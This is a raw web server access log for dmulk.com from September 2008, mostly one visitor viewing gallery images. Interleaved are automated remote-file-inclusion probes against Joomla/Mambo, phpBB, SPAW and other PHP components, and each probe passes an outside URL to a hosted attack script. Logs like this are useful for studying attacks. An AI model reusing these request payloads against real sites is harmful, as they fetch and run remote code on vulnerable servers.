72.199.235.196 - - [20/Sep/2008:09:38:12 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0012.jpg HTTP/1.1" 200 557735 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:38:13 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-096_0.jpg HTTP/1.1" 200 323897 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:38:15 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-286.jpg HTTP/1.1" 200 270186 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:38:25 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0011.jpg HTTP/1.1" 200 578661 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:38:25 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-200.jpg HTTP/1.1" 200 432523 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
219.85.63.226 - - [20/Sep/2008:09:38:27 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.crosstalk.cc/NT_files/idfx.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
219.85.63.226 - - [20/Sep/2008:09:38:27 -0700] "GET /logs/access_080319.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.crosstalk.cc/NT_files/idfx.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
219.85.63.226 - - [20/Sep/2008:09:38:27 -0700] "GET /logs/access_080702.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.crosstalk.cc/NT_files/idfx.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
219.85.63.226 - - [20/Sep/2008:09:38:27 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.crosstalk.cc/NT_files/idfx.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:38:28 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-152.jpg HTTP/1.1" 200 324155 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:38:29 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0164.jpg HTTP/1.1" 200 386584 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
74.208.79.206 - - [20/Sep/2008:09:38:32 -0700] "GET /logs/index.php?option=com_virtuemart&Itemid=&mosConfig_absolute_path=http://vobucks.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
74.208.79.206 - - [20/Sep/2008:09:38:33 -0700] "GET /index.php?option=com_virtuemart&Itemid=&mosConfig_absolute_path=http://vobucks.com/bo.do?? HTTP/1.1" 200 92461 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
200.11.67.242 - - [20/Sep/2008:09:38:33 -0700] "GET /logs/access_080611.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://jofchurch.org/calendar/includes/kosova.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [20/Sep/2008:09:38:35 -0700] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://jofchurch.org/calendar/includes/kosova.txt?? HTTP/1.1" 200 92676 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [20/Sep/2008:09:38:35 -0700] "GET /logs/access_080611.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://jofchurch.org/calendar/includes/kosova.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [20/Sep/2008:09:38:36 -0700] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://jofchurch.org/calendar/includes/kosova.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [20/Sep/2008:09:38:37 -0700] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://jofchurch.org/calendar/includes/kosova.txt?? HTTP/1.1" 200 92660 "-" "libwww-perl/5.65" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:38:38 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0038.jpg HTTP/1.1" 200 500121 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:38:38 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-134.jpg HTTP/1.1" 200 429690 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
200.11.67.242 - - [20/Sep/2008:09:38:38 -0700] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://jofchurch.org/calendar/includes/kosova.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:38:41 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0144.jpg HTTP/1.1" 200 316667 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:38:41 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-077_1.jpg HTTP/1.1" 200 398683 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
200.11.67.242 - - [20/Sep/2008:09:38:48 -0700] "GET /logs/access_080121.log/index.php?redir=http://jofchurch.org/calendar/includes/kosova.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [20/Sep/2008:09:38:50 -0700] "GET /index.php?redir=http://jofchurch.org/calendar/includes/kosova.txt?? HTTP/1.1" 200 92331 "-" "libwww-perl/5.65" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:38:50 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-041_0.jpg HTTP/1.1" 200 307796 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:38:50 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0076.jpg HTTP/1.1" 200 388166 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
200.11.67.242 - - [20/Sep/2008:09:38:52 -0700] "GET /logs/index.php?redir=http://jofchurch.org/calendar/includes/kosova.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:38:54 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-239.jpg HTTP/1.1" 200 549595 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
208.127.86.8 - - [20/Sep/2008:09:38:59 -0700] "GET //modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://piti.100megsfree8.com/id.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.127.86.8 - - [20/Sep/2008:09:39:02 -0700] "GET //modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://piti.100megsfree8.com/id.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:39:03 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-095_0.jpg HTTP/1.1" 200 339830 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:39:03 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0029.jpg HTTP/1.1" 200 446605 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:39:04 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0150.jpg HTTP/1.1" 200 378254 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:39:06 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-281.jpg HTTP/1.1" 200 347085 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:39:15 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0005.jpg HTTP/1.1" 200 445675 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:39:16 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-283.jpg HTTP/1.1" 200 312360 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:39:16 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0160.jpg HTTP/1.1" 200 386726 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
217.75.193.70 - - [20/Sep/2008:09:39:16 -0700] "GET /logs/access_080615.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.asa-auto.ba/mambo/cache/fastid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.47.10.168 - - [20/Sep/2008:09:39:17 -0700] "GET /admin/editor2/spaw_control.class.php?spaw_root=http://www.natusa.spb.ru/skins/breeze/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.47.10.168 - - [20/Sep/2008:09:39:17 -0700] "GET /logs/admin/editor2/spaw_control.class.php?spaw_root=http://www.natusa.spb.ru/skins/breeze/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:39:19 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-030_2.jpg HTTP/1.1" 200 383669 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
88.34.216.2 - - [20/Sep/2008:09:39:24 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://piti.100megsfree8.com/id.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.34.216.2 - - [20/Sep/2008:09:39:24 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://piti.100megsfree8.com/id.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:39:28 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0134.jpg HTTP/1.1" 200 359537 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:39:28 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0151.jpg HTTP/1.1" 200 352070 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:39:29 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-165_0.jpg HTTP/1.1" 200 504582 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
65.254.54.122 - - [20/Sep/2008:09:39:29 -0700] "GET /logs/access_080905.log//collect.php?neturl=http://webmail.cyber.it/forums/ecodellemissioni/cache/cx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:39:32 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-102.jpg HTTP/1.1" 200 456052 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
65.254.54.122 - - [20/Sep/2008:09:39:37 -0700] "GET /logs/access_080905.log//collect.php?neturl=http://webmail.cyber.it/forums/ecodellemissioni/cache/cx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:39:41 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0064.jpg HTTP/1.1" 200 435434 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:39:41 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-129_1.jpg HTTP/1.1" 200 411984 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
69.65.124.161 - - [20/Sep/2008:09:39:41 -0700] "GET /logs/index.php?option=com_virtuemart&Itemid=&mosConfig_absolute_path=http://www.estetica-medica.com/images/admin/bo.do? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
69.65.124.161 - - [20/Sep/2008:09:39:42 -0700] "GET /index.php?option=com_virtuemart&Itemid=&mosConfig_absolute_path=http://www.estetica-medica.com/images/admin/bo.do? HTTP/1.1" 200 92575 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:39:45 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0094.jpg HTTP/1.1" 200 514980 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:39:53 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0158.jpg HTTP/1.1" 200 306017 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:39:53 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0056.jpg HTTP/1.1" 200 339046 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:39:54 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-176.jpg HTTP/1.1" 200 360406 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:40:05 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0172.jpg HTTP/1.1" 200 364812 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:40:06 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0020.jpg HTTP/1.1" 200 361318 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:40:06 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-026_1.jpg HTTP/1.1" 200 408028 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:40:13 -0700] "GET /blog/wp-content/gallery/techstoc-2008/img_1023.jpg HTTP/1.1" 200 313610 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
65.254.54.122 - - [20/Sep/2008:09:40:15 -0700] "GET /logs/access_080527.log/data/inc/lang/en.php?=http://webmail.cyber.it/forums/ecodellemissioni/cache/cx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
88.84.156.46 - - [20/Sep/2008:09:40:16 -0700] "GET /logs//&Itemid=&mosConfig_absolute_path=http://www.casicool.de/chat/lib/bid.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
88.84.156.46 - - [20/Sep/2008:09:40:16 -0700] "GET //&Itemid=&mosConfig_absolute_path=http://www.casicool.de/chat/lib/bid.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:40:17 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0142.jpg HTTP/1.1" 200 309100 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
65.254.54.122 - - [20/Sep/2008:09:40:18 -0700] "GET /logs/access_080527.log/data/inc/lang/en.php?=http://webmail.cyber.it/forums/ecodellemissioni/cache/cx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:40:21 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0084.jpg HTTP/1.1" 200 486728 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:40:24 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-005_0.jpg HTTP/1.1" 200 419132 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:40:26 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-172_0.jpg HTTP/1.1" 200 281931 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:40:35 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0136_0.jpg HTTP/1.1" 200 329003 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:40:36 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0073.jpg HTTP/1.1" 200 392284 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:40:37 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-152_1.jpg HTTP/1.1" 200 358762 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:40:38 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0014.jpg HTTP/1.1" 200 376404 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
61.47.10.168 - - [20/Sep/2008:09:40:40 -0700] "GET /admin/editor2/spaw_control.class.php?spaw_root=http://www.natusa.spb.ru/skins/breeze/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.47.10.168 - - [20/Sep/2008:09:40:40 -0700] "GET /logs/admin/editor2/spaw_control.class.php?spaw_root=http://www.natusa.spb.ru/skins/breeze/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:40:47 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0140.jpg HTTP/1.1" 200 351155 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:40:49 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0125.jpg HTTP/1.1" 200 499020 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:40:49 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-022.jpg HTTP/1.1" 200 445046 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:40:51 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-015_1.jpg HTTP/1.1" 200 558864 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
88.191.76.130 - - [20/Sep/2008:09:40:52 -0700] "GET /logs/access_080907.log//index.php?view=page&pagename=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.191.76.130 - - [20/Sep/2008:09:40:52 -0700] "GET /logs/access_080907.log//index.php?view=page&pagename=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.191.76.130 - - [20/Sep/2008:09:40:53 -0700] "GET //index.php?view=page&pagename=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 200 7948 "-" "libwww-perl/5.805" "www.dmulk.com"
88.191.76.130 - - [20/Sep/2008:09:40:54 -0700] "GET //index.php?view=page&pagename=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 200 7948 "-" "libwww-perl/5.805" "www.dmulk.com"
88.191.76.130 - - [20/Sep/2008:09:40:54 -0700] "GET /logs//index.php?view=page&pagename=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.191.76.130 - - [20/Sep/2008:09:40:54 -0700] "GET /logs//index.php?view=page&pagename=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.191.76.130 - - [20/Sep/2008:09:40:54 -0700] "GET /logs/access_080228.log//index.php?view=page&pagename=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.191.76.130 - - [20/Sep/2008:09:40:54 -0700] "GET /logs/access_080228.log//index.php?view=page&pagename=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:41:02 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-010_1.jpg HTTP/1.1" 200 548534 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
83.64.132.254 - - [20/Sep/2008:09:41:02 -0700] "GET /logs/access_080714.log//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.alevichat.com/ids.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:41:03 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0060.jpg HTTP/1.1" 200 373725 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
83.64.132.254 - - [20/Sep/2008:09:41:04 -0700] "GET //include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.alevichat.com/ids.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
83.64.132.254 - - [20/Sep/2008:09:41:10 -0700] "GET /logs/access_080705.log//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.alevichat.com/ids.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:41:10 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0170.jpg HTTP/1.1" 200 360510 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:41:12 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0106.jpg HTTP/1.1" 200 331757 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:41:14 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-006_2.jpg HTTP/1.1" 200 343121 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:41:15 -0700] "GET /blog/wp-content/gallery/techstoc-2008/img_1013.jpg HTTP/1.1" 200 340617 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:41:16 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-280.jpg HTTP/1.1" 200 371621 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
74.6.18.225 - - [20/Sep/2008:09:41:18 -0700] "GET /logs/access_080630.log HTTP/1.0" 200 196608 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:41:23 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0162.jpg HTTP/1.1" 200 355966 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
